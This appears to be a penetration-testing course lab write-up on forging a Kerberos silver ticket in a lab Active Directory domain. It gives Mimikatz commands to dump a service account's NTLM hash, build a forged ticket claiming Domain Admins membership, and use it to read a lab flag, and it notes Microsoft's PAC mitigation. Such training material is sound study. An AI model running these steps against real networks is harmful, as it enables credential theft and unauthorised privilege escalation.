Topics: Silver Tickets
Questions 

# Answer

# With the service account password or its associated NTLM hash at hand, we can forge our own service ticket to access the target resource (in our example, the IIS application) with any permissions we desire. This custom-created ticket is known as a silver ticket3 and if the service principal name is used on multiple servers, the silver ticket can be leveraged against them all.

# In this section's example, we'll create a silver ticket to get access to an HTTP SPN resource. As we identified in the previous section, the iis_service user account is mapped to an HTTP SPN. Therefore, the password hash of the user account is used to create service tickets for it.

# we need to collect the following three pieces of information to create a silver ticket:
- PN password hash
- Domain SID
- Target SPN

# First, let's confirm that our current user has no access to the resource of the HTTP SPN mapped to iis_service. To do so, we'll use iwr4 and enter -UseDefaultCredentials so that the credentials of the current user are used to send the web request.

PS C:\Users\jeff> iwr -UseDefaultCredentials http://web04
...
401 - Unauthorized: Access is denied due to invalid credentials.
...

# Since we are a local Administrator on this machine where iis_service has an established session, we can use Mimikatz to retrieve the SPN password hash (NTLM hash of iis_service), which is the first piece of information we need to create a silver ticket.

# Let's start PowerShell as Administrator and launch Mimikatz. As we already learned, we can use privilege::debug and sekurlsa::logonpasswords to extract cached AD credentials.
PS C:\Tools> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
...
        msv :
         [00000003] Primary
         * Username : iis_service
         * NTLM     : 4d28cf5252d39971419580a51484ca09
         * SHA1     : ad321732afe417ebbd24d5c098f986c07872f312
...
# The NTLM hash of the service account is the first piece of information we need to create the silver ticket.
# Now, let's obtain the domain SID, the second piece of information we need. We can enter whoami /user to get the SID of the current user. Alternatively, we could also retrieve the SID of the SPN user account from the output of Mimikatz, since the domain user accounts exist in the same domain.

PS C:\Users\jeff> whoami /user
...
corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105
...

# As covered in the Windows Privilege Escalation Module, the SID consists of several parts. Since we're only interested in the Domain SID, we'll omit the RID of the user.
S-1-5-21-1987370270-658905905-1781884369

# The last list item is the target SPN. For this example, we'll target the HTTP SPN resource on WEB04 (HTTP/web04.corp.com:80) because we want to access the web page running on IIS.

# Now that we can build the command to create a silver ticket with Mimikatz
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
...
User      : jeffadmin
Domain    : corp.com (CORP)
SID       : S-1-5-21-1987370270-658905905-1781884369
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d28cf5252d39971419580a51484ca09 - rc4_hmac_nt
Service   : http
Target    : web04.corp.com
Lifetime  : 5/20/2024 2:42:46 AM ; 5/18/2034 2:42:46 AM ; 5/18/2034 2:42:46 AM
...

# a new service ticket for the SPN HTTP/web04.corp.com has been loaded into memory and Mimikatz set appropriate group membership permissions in the forged ticket. From the perspective of the IIS application, the current user will be both the built-in local administrator ( Relative Id: 500 ) and a member of several highly-privileged groups, including the Domain Admins group ( Relative Id: 512 ) as highlighted above.
PS C:\Tools> klists
...
Cached Tickets: (1)
#0>     Client: jeffadmin @ corp.com
        Server: http/web04.corp.com @ corp.com
...

PS C:\Tools> iwr -UseDefaultCredentials http://web04
...
StatusCode        : 200
StatusDescription : OK
Content           : <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
                    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
...

# We successfully forged a service ticket and got access to the web page as jeffadmin.

# Once we have access to the password hash of the SPN, a machine account, or user, we can forge the related service tickets for any users and permissions. This is a great way of accessing SPNs in later phases of a penetration test, as we need privileged access in most situations to retrieve the password hash of the SPN.

# Since silver and golden tickets represent powerful attack techniques, Microsoft created a security patch to update the PAC structure. With this patch in place, the extended PAC structure field PAC_REQUESTOR needs to be validated by a domain controller. This mitigates the capability to forge tickets for non-existent domain users if the client and the KDC are in the same domain. Without this patch, we could create silver tickets for domain users that do not exist. 

# Go back to the question
PS C:\Tools> iwr -UseDefaultCredentials http://web04 | Select-Object -Expand Content
...
<!-- OS{5ac288af4141f45260214327cbec51be} -->
...



